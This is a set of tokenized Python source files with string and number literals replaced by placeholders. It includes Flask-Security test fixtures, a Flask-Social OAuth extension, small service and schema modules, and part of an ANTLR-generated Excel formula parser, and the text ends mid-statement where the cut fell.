<NUM_LIT:2> ] , <EOL> ( <NUM_LIT:1> , <NUM_LIT:12> ) : tokens [ <NUM_LIT:3> ] , <EOL> } <EOL> raw = { } <EOL> return SourceMapIndex ( raw , tokens , rows , index ) , tokens <EOL> def test_lookup ( self ) : <EOL> index , tokens = self . get_index ( ) <EOL> for i in range ( <NUM_LIT:5> ) : <EOL> assert index . lookup ( <NUM_LIT:0> , i ) is tokens [ <NUM_LIT:0> ] <EOL> for i in range ( <NUM_LIT:5> , <NUM_LIT:10> ) : <EOL> assert index . lookup ( <NUM_LIT:0> , i ) is tokens [ <NUM_LIT:1> ] <EOL> for i in range ( <NUM_LIT:12> ) : <EOL> assert index . lookup ( <NUM_LIT:1> , i ) is tokens [ <NUM_LIT:2> ] <EOL> for i in range ( <NUM_LIT:12> , <NUM_LIT:20> ) : <EOL> assert index . 
lookup ( <NUM_LIT:1> , i ) is tokens [ <NUM_LIT:3> ] <EOL> def test_getitem ( self ) : <EOL> index , tokens = self . get_index ( ) <EOL> for i in range ( <NUM_LIT:4> ) : <EOL> assert index [ i ] is tokens [ i ] <EOL> def test_iter ( self ) : <EOL> index , tokens = self . get_index ( ) <EOL> for idx , token in enumerate ( index ) : <EOL> assert token is tokens [ idx ] <EOL> def test_len ( self ) : <EOL> index , tokens = self . get_index ( ) <EOL> assert len ( index ) == len ( tokens ) </s>
<s> """<STR_LIT>""" <EOL> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = __doc__ , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> zip_safe = False , <EOL> platforms = '<STR_LIT>' , <EOL> install_requires = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> test_suite = '<STR_LIT>' , <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import tempfile <EOL> import time <EOL> import pytest <EOL> from flask import Flask , render_template <EOL> from flask_mail import Mail <EOL> from flask_security import Security , MongoEngineUserDatastore , SQLAlchemyUserDatastore , PeeweeUserDatastore , UserMixin , RoleMixin , http_auth_required , login_required , auth_token_required , auth_required , roles_required , roles_accepted <EOL> from utils import populate_data , Response <EOL> @ pytest . fixture ( ) <EOL> def app ( request ) : <EOL> app = Flask ( __name__ ) <EOL> app . response_class = Response <EOL> app . debug = True <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> app . config [ '<STR_LIT>' ] = True <EOL> app . config [ '<STR_LIT>' ] = False <EOL> app . config [ '<STR_LIT>' ] = False <EOL> for opt in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> app . config [ '<STR_LIT>' + opt . upper ( ) ] = opt in request . keywords <EOL> if '<STR_LIT>' in request . keywords : <EOL> for key , value in request . keywords [ '<STR_LIT>' ] . kwargs . items ( ) : <EOL> app . config [ '<STR_LIT>' + key . upper ( ) ] = value <EOL> mail = Mail ( app ) <EOL> app . mail = mail <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ login_required <EOL> def profile ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ login_required <EOL> def post_login ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ http_auth_required <EOL> def http ( ) : <EOL> return '<STR_LIT>' <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ http_auth_required ( '<STR_LIT>' ) <EOL> def http_custom_realm ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . 
route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> @ auth_token_required <EOL> def token ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ auth_required ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def multi_auth ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def post_logout ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def post_register ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ roles_required ( '<STR_LIT>' ) <EOL> def admin ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ roles_required ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def admin_and_editor ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ roles_accepted ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def admin_or_editor ( ) : <EOL> return render_template ( '<STR_LIT>' , content = '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def unauthorized ( ) : <EOL> return render_template ( '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def page_1 ( ) : <EOL> return '<STR_LIT>' <EOL> return app <EOL> @ pytest . fixture ( ) <EOL> def mongoengine_datastore ( request , app ) : <EOL> from flask_mongoengine import MongoEngine <EOL> db_name = '<STR_LIT>' % str ( time . time ( ) ) . replace ( '<STR_LIT:.>' , '<STR_LIT:_>' ) <EOL> app . config [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : db_name , <EOL> '<STR_LIT:host>' : '<STR_LIT:localhost>' , <EOL> '<STR_LIT:port>' : <NUM_LIT> , <EOL> '<STR_LIT>' : db_name <EOL> } <EOL> db = MongoEngine ( app ) <EOL> class Role ( db . Document , RoleMixin ) : <EOL> name = db . 
StringField ( required = True , unique = True , max_length = <NUM_LIT> ) <EOL> description = db . StringField ( max_length = <NUM_LIT:255> ) <EOL> meta = { "<STR_LIT>" : db_name } <EOL> class User ( db . Document , UserMixin ) : <EOL> email = db . StringField ( unique = True , max_length = <NUM_LIT:255> ) <EOL> username = db . StringField ( max_length = <NUM_LIT:255> ) <EOL> password = db . StringField ( required = False , max_length = <NUM_LIT:255> ) <EOL> last_login_at = db . DateTimeField ( ) <EOL> current_login_at = db . DateTimeField ( ) <EOL> last_login_ip = db . StringField ( max_length = <NUM_LIT:100> ) <EOL> current_login_ip = db . StringField ( max_length = <NUM_LIT:100> ) <EOL> login_count = db . IntField ( ) <EOL> active = db . BooleanField ( default = True ) <EOL> confirmed_at = db . DateTimeField ( ) <EOL> roles = db . ListField ( db . ReferenceField ( Role ) , default = [ ] ) <EOL> meta = { "<STR_LIT>" : db_name } <EOL> request . addfinalizer ( lambda : db . connection . drop_database ( db_name ) ) <EOL> return MongoEngineUserDatastore ( db , User , Role ) <EOL> @ pytest . fixture ( ) <EOL> def sqlalchemy_datastore ( request , app , tmpdir ) : <EOL> from flask_sqlalchemy import SQLAlchemy <EOL> f , path = tempfile . mkstemp ( prefix = '<STR_LIT>' , suffix = '<STR_LIT>' , dir = str ( tmpdir ) ) <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' + path <EOL> db = SQLAlchemy ( app ) <EOL> roles_users = db . Table ( <EOL> '<STR_LIT>' , <EOL> db . Column ( '<STR_LIT>' , db . Integer ( ) , db . ForeignKey ( '<STR_LIT>' ) ) , <EOL> db . Column ( '<STR_LIT>' , db . Integer ( ) , db . ForeignKey ( '<STR_LIT>' ) ) ) <EOL> class Role ( db . Model , RoleMixin ) : <EOL> id = db . Column ( db . Integer ( ) , primary_key = True ) <EOL> name = db . Column ( db . String ( <NUM_LIT> ) , unique = True ) <EOL> description = db . Column ( db . String ( <NUM_LIT:255> ) ) <EOL> class User ( db . Model , UserMixin ) : <EOL> id = db . Column ( db . 
Integer , primary_key = True ) <EOL> email = db . Column ( db . String ( <NUM_LIT:255> ) , unique = True ) <EOL> username = db . Column ( db . String ( <NUM_LIT:255> ) ) <EOL> password = db . Column ( db . String ( <NUM_LIT:255> ) ) <EOL> last_login_at = db . Column ( db . DateTime ( ) ) <EOL> current_login_at = db . Column ( db . DateTime ( ) ) <EOL> last_login_ip = db . Column ( db . String ( <NUM_LIT:100> ) ) <EOL> current_login_ip = db . Column ( db . String ( <NUM_LIT:100> ) ) <EOL> login_count = db . Column ( db . Integer ) <EOL> active = db . Column ( db . Boolean ( ) ) <EOL> confirmed_at = db . Column ( db . DateTime ( ) ) <EOL> roles = db . relationship ( '<STR_LIT>' , secondary = roles_users , <EOL> backref = db . backref ( '<STR_LIT>' , lazy = '<STR_LIT>' ) ) <EOL> with app . app_context ( ) : <EOL> db . create_all ( ) <EOL> request . addfinalizer ( lambda : os . remove ( path ) ) <EOL> return SQLAlchemyUserDatastore ( db , User , Role ) <EOL> @ pytest . fixture ( ) <EOL> def peewee_datastore ( request , app , tmpdir ) : <EOL> from peewee import TextField , DateTimeField , IntegerField , BooleanField , ForeignKeyField <EOL> from flask_peewee . db import Database <EOL> f , path = tempfile . mkstemp ( prefix = '<STR_LIT>' , suffix = '<STR_LIT>' , dir = str ( tmpdir ) ) <EOL> app . config [ '<STR_LIT>' ] = { <EOL> '<STR_LIT:name>' : path , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> db = Database ( app ) <EOL> class Role ( db . Model , RoleMixin ) : <EOL> name = TextField ( unique = True ) <EOL> description = TextField ( null = True ) <EOL> class User ( db . 
Model , UserMixin ) : <EOL> email = TextField ( ) <EOL> username = TextField ( ) <EOL> password = TextField ( null = True ) <EOL> last_login_at = DateTimeField ( null = True ) <EOL> current_login_at = DateTimeField ( null = True ) <EOL> last_login_ip = TextField ( null = True ) <EOL> current_login_ip = TextField ( null = True ) <EOL> login_count = IntegerField ( null = True ) <EOL> active = BooleanField ( default = True ) <EOL> confirmed_at = DateTimeField ( null = True ) <EOL> class UserRoles ( db . Model ) : <EOL> """<STR_LIT>""" <EOL> user = ForeignKeyField ( User , related_name = '<STR_LIT>' ) <EOL> role = ForeignKeyField ( Role , related_name = '<STR_LIT>' ) <EOL> name = property ( lambda self : self . role . name ) <EOL> description = property ( lambda self : self . role . description ) <EOL> with app . app_context ( ) : <EOL> for Model in ( Role , User , UserRoles ) : <EOL> Model . create_table ( ) <EOL> request . addfinalizer ( lambda : os . remove ( path ) ) <EOL> return PeeweeUserDatastore ( db , User , Role , UserRoles ) <EOL> @ pytest . fixture ( ) <EOL> def sqlalchemy_app ( app , sqlalchemy_datastore ) : <EOL> def create ( ) : <EOL> app . security = Security ( app , datastore = sqlalchemy_datastore ) <EOL> return app <EOL> return create <EOL> @ pytest . fixture ( ) <EOL> def peewee_app ( app , peewee_datastore ) : <EOL> def create ( ) : <EOL> app . security = Security ( app , datastore = peewee_datastore ) <EOL> return app <EOL> return create <EOL> @ pytest . fixture ( ) <EOL> def mongoengine_app ( app , mongoengine_datastore ) : <EOL> def create ( ) : <EOL> app . security = Security ( app , datastore = mongoengine_datastore ) <EOL> return app <EOL> return create <EOL> @ pytest . fixture ( ) <EOL> def client ( request , sqlalchemy_app ) : <EOL> app = sqlalchemy_app ( ) <EOL> populate_data ( app ) <EOL> return app . test_client ( ) <EOL> @ pytest . fixture ( ) <EOL> def get_message ( app ) : <EOL> def fn ( key , ** kwargs ) : <EOL> rv = app . 
config [ '<STR_LIT>' + key ] [ <NUM_LIT:0> ] % kwargs <EOL> return rv . encode ( '<STR_LIT:utf-8>' ) <EOL> return fn <EOL> @ pytest . fixture ( params = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def datastore ( request , sqlalchemy_datastore , mongoengine_datastore , peewee_datastore ) : <EOL> if request . param == '<STR_LIT>' : <EOL> rv = sqlalchemy_datastore <EOL> elif request . param == '<STR_LIT>' : <EOL> rv = mongoengine_datastore <EOL> elif request . param == '<STR_LIT>' : <EOL> rv = peewee_datastore <EOL> return rv </s>
<s> """<STR_LIT>""" <EOL> from importlib import import_module <EOL> from flask import current_app <EOL> from flask_oauthlib . client import OAuthRemoteApp as BaseRemoteApp <EOL> from flask . ext . security import current_user <EOL> from werkzeug . local import LocalProxy <EOL> from . utils import get_config , update_recursive <EOL> from . views import create_blueprint <EOL> _security = LocalProxy ( lambda : current_app . extensions [ '<STR_LIT>' ] ) <EOL> _social = LocalProxy ( lambda : current_app . extensions [ '<STR_LIT>' ] ) <EOL> _datastore = LocalProxy ( lambda : _social . datastore ) <EOL> _logger = LocalProxy ( lambda : current_app . logger ) <EOL> default_config = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> class OAuthRemoteApp ( BaseRemoteApp ) : <EOL> def __init__ ( self , id , module , install , * args , ** kwargs ) : <EOL> BaseRemoteApp . __init__ ( self , None , ** kwargs ) <EOL> self . id = id <EOL> self . module = module <EOL> def get_connection ( self ) : <EOL> return _social . datastore . find_connection ( provider_id = self . id , <EOL> user_id = current_user . id ) <EOL> def get_api ( self ) : <EOL> module = import_module ( self . module ) <EOL> connection = self . get_connection ( ) <EOL> if connection is None : <EOL> return None <EOL> return module . get_api ( connection = connection , <EOL> consumer_key = self . consumer_key , <EOL> consumer_secret = self . consumer_secret ) <EOL> def _get_state ( app , datastore , providers , ** kwargs ) : <EOL> config = get_config ( app ) <EOL> for key in providers . keys ( ) : <EOL> config . pop ( key . upper ( ) ) <EOL> for key , value in config . items ( ) : <EOL> kwargs [ key . lower ( ) ] = value <EOL> kwargs . 
update ( dict ( <EOL> app = app , <EOL> datastore = datastore , <EOL> providers = providers ) ) <EOL> return _SocialState ( ** kwargs ) <EOL> class _SocialState ( object ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> for key , value in kwargs . items ( ) : <EOL> setattr ( self , key . lower ( ) , value ) <EOL> def __getattr__ ( self , name ) : <EOL> try : <EOL> return self . providers [ name ] <EOL> except KeyError : <EOL> msg = "<STR_LIT>" % name <EOL> raise AttributeError ( msg ) <EOL> def _get_token ( ) : <EOL> return None <EOL> class Social ( object ) : <EOL> def __init__ ( self , app = None , datastore = None ) : <EOL> self . app = app <EOL> self . datastore = datastore <EOL> if app is not None and datastore is not None : <EOL> self . _state = self . init_app ( app , datastore ) <EOL> def init_app ( self , app , datastore = None ) : <EOL> """<STR_LIT>""" <EOL> datastore = datastore or self . datastore <EOL> for key , value in default_config . items ( ) : <EOL> app . config . setdefault ( key , value ) <EOL> providers = dict ( ) <EOL> for key , config in app . config . items ( ) : <EOL> if not key . startswith ( '<STR_LIT>' ) or config is None or key in default_config : <EOL> continue <EOL> suffix = key . lower ( ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> default_module_name = '<STR_LIT>' % suffix <EOL> module_name = config . get ( '<STR_LIT>' , default_module_name ) <EOL> module = import_module ( module_name ) <EOL> config = update_recursive ( module . config , config ) <EOL> providers [ config [ '<STR_LIT:id>' ] ] = OAuthRemoteApp ( ** config ) <EOL> providers [ config [ '<STR_LIT:id>' ] ] . tokengetter ( _get_token ) <EOL> state = _get_state ( app , datastore , providers ) <EOL> app . register_blueprint ( create_blueprint ( state , __name__ ) ) <EOL> app . extensions [ '<STR_LIT>' ] = state <EOL> return state <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( self . _state , name , None ) </s>
<s> """<STR_LIT>""" <EOL> from flask . ext . script import Manager <EOL> from overholt . api import create_app <EOL> from overholt . manage import CreateUserCommand , DeleteUserCommand , ListUsersCommand <EOL> manager = Manager ( create_app ( ) ) <EOL> manager . add_command ( '<STR_LIT>' , CreateUserCommand ( ) ) <EOL> manager . add_command ( '<STR_LIT>' , DeleteUserCommand ( ) ) <EOL> manager . add_command ( '<STR_LIT>' , ListUsersCommand ( ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> manager . run ( ) </s>
<s> """<STR_LIT>""" <EOL> from . . core import Service <EOL> from . models import User <EOL> class UsersService ( Service ) : <EOL> __model__ = User </s>
<s> from marshmallow import Schema , fields , validate <EOL> class OptionSchema ( Schema ) : <EOL> id = fields . Integer ( dump_only = True ) <EOL> description = fields . String ( required = True ) <EOL> created_at = fields . DateTime ( dump_only = True ) <EOL> class VotingSchema ( Schema ) : <EOL> id = fields . Integer ( dump_only = True ) <EOL> description = fields . String ( required = True ) <EOL> created_at = fields . DateTime ( dump_only = True ) <EOL> options = fields . Nested ( <EOL> OptionSchema , many = True , required = True , <EOL> validate = validate . Length ( min = <NUM_LIT:2> , error = '<STR_LIT>' ) <EOL> ) <EOL> class Meta : <EOL> ordered = True <EOL> class VoteSchema ( Schema ) : <EOL> option = fields . Integer ( required = True ) </s>
<s> import sys <EOL> import antlr <EOL> version = sys . version . split ( ) [ <NUM_LIT:0> ] <EOL> if version < '<STR_LIT>' : <EOL> False = <NUM_LIT:0> <EOL> if version < '<STR_LIT>' : <EOL> True = not False <EOL> import struct <EOL> import Utils <EOL> from UnicodeUtils import upack1 <EOL> from ExcelMagic import * <EOL> _RVAdelta = { "<STR_LIT:R>" : <NUM_LIT:0> , "<STR_LIT>" : <NUM_LIT> , "<STR_LIT:A>" : <NUM_LIT> } <EOL> _RVAdeltaRef = { "<STR_LIT:R>" : <NUM_LIT:0> , "<STR_LIT>" : <NUM_LIT> , "<STR_LIT:A>" : <NUM_LIT> , "<STR_LIT:D>" : <NUM_LIT> } <EOL> _RVAdeltaArea = { "<STR_LIT:R>" : <NUM_LIT:0> , "<STR_LIT>" : <NUM_LIT> , "<STR_LIT:A>" : <NUM_LIT> , "<STR_LIT:D>" : <NUM_LIT:0> } <EOL> class FormulaParseException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> SKIP = antlr . SKIP <EOL> INVALID_TYPE = antlr . INVALID_TYPE <EOL> EOF_TYPE = antlr . EOF_TYPE <EOL> EOF = antlr . EOF <EOL> NULL_TREE_LOOKAHEAD = antlr . NULL_TREE_LOOKAHEAD <EOL> MIN_USER_TYPE = antlr . MIN_USER_TYPE <EOL> TRUE_CONST = <NUM_LIT:4> <EOL> FALSE_CONST = <NUM_LIT:5> <EOL> STR_CONST = <NUM_LIT:6> <EOL> NUM_CONST = <NUM_LIT:7> <EOL> INT_CONST = <NUM_LIT:8> <EOL> FUNC_IF = <NUM_LIT:9> <EOL> FUNC_CHOOSE = <NUM_LIT:10> <EOL> NAME = <NUM_LIT:11> <EOL> QUOTENAME = <NUM_LIT:12> <EOL> EQ = <NUM_LIT> <EOL> NE = <NUM_LIT> <EOL> GT = <NUM_LIT:15> <EOL> LT = <NUM_LIT:16> <EOL> GE = <NUM_LIT> <EOL> LE = <NUM_LIT> <EOL> ADD = <NUM_LIT> <EOL> SUB = <NUM_LIT:20> <EOL> MUL = <NUM_LIT> <EOL> DIV = <NUM_LIT> <EOL> POWER = <NUM_LIT> <EOL> PERCENT = <NUM_LIT> <EOL> LP = <NUM_LIT> <EOL> RP = <NUM_LIT> <EOL> LB = <NUM_LIT> <EOL> RB = <NUM_LIT> <EOL> COLON = <NUM_LIT> <EOL> COMMA = <NUM_LIT:30> <EOL> SEMICOLON = <NUM_LIT> <EOL> REF2D = <NUM_LIT:32> <EOL> REF2D_R1C1 = <NUM_LIT> <EOL> BANG = <NUM_LIT> <EOL> CONCAT = <NUM_LIT> <EOL> class Parser ( antlr . LLkParser ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> antlr . LLkParser . __init__ ( self , * args , ** kwargs ) <EOL> self . 
tokenNames = _tokenNames <EOL> self . rpn = "<STR_LIT>" <EOL> self . sheet_references = [ ] <EOL> self . xcall_references = [ ] <EOL> def formula ( self ) : <EOL> pass <EOL> self . expr ( "<STR_LIT>" ) <EOL> def expr ( self , <EOL> arg_type <EOL> ) : <EOL> pass <EOL> self . prec0_expr ( arg_type ) <EOL> while True : <EOL> if ( ( self . LA ( <NUM_LIT:1> ) >= EQ and self . LA ( <NUM_LIT:1> ) <= LE ) ) : <EOL> pass <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ EQ ] : <EOL> pass <EOL> self . match ( EQ ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgEQ ) <EOL> elif la1 and la1 in [ NE ] : <EOL> pass <EOL> self . match ( NE ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgNE ) <EOL> elif la1 and la1 in [ GT ] : <EOL> pass <EOL> self . match ( GT ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgGT ) <EOL> elif la1 and la1 in [ LT ] : <EOL> pass <EOL> self . match ( LT ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgLT ) <EOL> elif la1 and la1 in [ GE ] : <EOL> pass <EOL> self . match ( GE ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgGE ) <EOL> elif la1 and la1 in [ LE ] : <EOL> pass <EOL> self . match ( LE ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgLE ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> self . prec0_expr ( arg_type ) <EOL> self . rpn += op <EOL> else : <EOL> break <EOL> def prec0_expr ( self , <EOL> arg_type <EOL> ) : <EOL> pass <EOL> self . prec1_expr ( arg_type ) <EOL> while True : <EOL> if ( self . LA ( <NUM_LIT:1> ) == CONCAT ) : <EOL> pass <EOL> pass <EOL> self . match ( CONCAT ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgConcat ) <EOL> self . prec1_expr ( arg_type ) <EOL> self . rpn += op <EOL> else : <EOL> break <EOL> def prec1_expr ( self , <EOL> arg_type <EOL> ) : <EOL> pass <EOL> self . prec2_expr ( arg_type ) <EOL> while True : <EOL> if ( self . LA ( <NUM_LIT:1> ) == ADD or self . 
LA ( <NUM_LIT:1> ) == SUB ) : <EOL> pass <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ ADD ] : <EOL> pass <EOL> self . match ( ADD ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgAdd ) <EOL> elif la1 and la1 in [ SUB ] : <EOL> pass <EOL> self . match ( SUB ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgSub ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> self . prec2_expr ( arg_type ) <EOL> self . rpn += op ; <EOL> else : <EOL> break <EOL> def prec2_expr ( self , <EOL> arg_type <EOL> ) : <EOL> pass <EOL> self . prec3_expr ( arg_type ) <EOL> while True : <EOL> if ( self . LA ( <NUM_LIT:1> ) == MUL or self . LA ( <NUM_LIT:1> ) == DIV ) : <EOL> pass <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ MUL ] : <EOL> pass <EOL> self . match ( MUL ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgMul ) <EOL> elif la1 and la1 in [ DIV ] : <EOL> pass <EOL> self . match ( DIV ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgDiv ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> self . prec3_expr ( arg_type ) <EOL> self . rpn += op <EOL> else : <EOL> break <EOL> def prec3_expr ( self , <EOL> arg_type <EOL> ) : <EOL> pass <EOL> self . prec4_expr ( arg_type ) <EOL> while True : <EOL> if ( self . LA ( <NUM_LIT:1> ) == POWER ) : <EOL> pass <EOL> pass <EOL> self . match ( POWER ) <EOL> op = struct . pack ( '<STR_LIT:B>' , ptgPower ) <EOL> self . prec4_expr ( arg_type ) <EOL> self . rpn += op <EOL> else : <EOL> break <EOL> def prec4_expr ( self , <EOL> arg_type <EOL> ) : <EOL> pass <EOL> self . prec5_expr ( arg_type ) <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ PERCENT ] : <EOL> pass <EOL> self . match ( PERCENT ) <EOL> self . rpn += struct . 
pack ( '<STR_LIT:B>' , ptgPercent ) <EOL> elif la1 and la1 in [ EOF , EQ , NE , GT , LT , GE , LE , ADD , SUB , MUL , DIV , POWER , RP , COMMA , SEMICOLON , CONCAT ] : <EOL> pass <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> def prec5_expr ( self , <EOL> arg_type <EOL> ) : <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ TRUE_CONST , FALSE_CONST , STR_CONST , NUM_CONST , INT_CONST , FUNC_IF , FUNC_CHOOSE , NAME , QUOTENAME , LP , REF2D ] : <EOL> pass <EOL> self . primary ( arg_type ) <EOL> elif la1 and la1 in [ SUB ] : <EOL> pass <EOL> self . match ( SUB ) <EOL> self . primary ( arg_type ) <EOL> self . rpn += struct . pack ( '<STR_LIT:B>' , ptgUminus ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> def primary ( self , <EOL> arg_type <EOL> ) : <EOL> str_tok = None <EOL> int_tok = None <EOL> num_tok = None <EOL> ref2d_tok = None <EOL> ref2d1_tok = None <EOL> ref2d2_tok = None <EOL> ref3d_ref2d = None <EOL> ref3d_ref2d2 = None <EOL> name_tok = None <EOL> func_tok = None <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ TRUE_CONST ] : <EOL> pass <EOL> self . match ( TRUE_CONST ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgBool , <NUM_LIT:1> ) <EOL> elif la1 and la1 in [ FALSE_CONST ] : <EOL> pass <EOL> self . match ( FALSE_CONST ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgBool , <NUM_LIT:0> ) <EOL> elif la1 and la1 in [ STR_CONST ] : <EOL> pass <EOL> str_tok = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( STR_CONST ) <EOL> self . rpn += struct . pack ( "<STR_LIT:B>" , ptgStr ) + upack1 ( str_tok . text [ <NUM_LIT:1> : - <NUM_LIT:1> ] . replace ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> elif la1 and la1 in [ NUM_CONST ] : <EOL> pass <EOL> num_tok = self . LT ( <NUM_LIT:1> ) <EOL> self . match ( NUM_CONST ) <EOL> self . 
rpn += struct . pack ( "<STR_LIT>" , ptgNum , float ( num_tok . text ) ) <EOL> elif la1 and la1 in [ FUNC_IF ] : <EOL> pass <EOL> self . match ( FUNC_IF ) <EOL> self . match ( LP ) <EOL> self . expr ( "<STR_LIT>" ) <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ SEMICOLON ] : <EOL> pass <EOL> self . match ( SEMICOLON ) <EOL> elif la1 and la1 in [ COMMA ] : <EOL> pass <EOL> self . match ( COMMA ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgAttr , <NUM_LIT> , <NUM_LIT:0> ) <EOL> pos0 = len ( self . rpn ) - <NUM_LIT:2> <EOL> self . expr ( arg_type ) <EOL> la1 = self . LA ( <NUM_LIT:1> ) <EOL> if False : <EOL> pass <EOL> elif la1 and la1 in [ SEMICOLON ] : <EOL> pass <EOL> self . match ( SEMICOLON ) <EOL> elif la1 and la1 in [ COMMA ] : <EOL> pass <EOL> self . match ( COMMA ) <EOL> else : <EOL> raise antlr . NoViableAltException ( self . LT ( <NUM_LIT:1> ) , self . getFilename ( ) ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgAttr , <NUM_LIT> , <NUM_LIT:0> ) <EOL> pos1 = len ( self . rpn ) - <NUM_LIT:2> <EOL> self . rpn = self . rpn [ : pos0 ] + struct . pack ( "<STR_LIT>" , pos1 - pos0 ) + self . rpn [ pos0 + <NUM_LIT:2> : ] <EOL> self . expr ( arg_type ) <EOL> self . match ( RP ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgAttr , <NUM_LIT> , <NUM_LIT:3> ) <EOL> self . rpn += struct . pack ( "<STR_LIT>" , ptgFuncVarR , <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> pos2 = len ( self . rpn ) <EOL> self . rpn = self . rpn [ : pos1 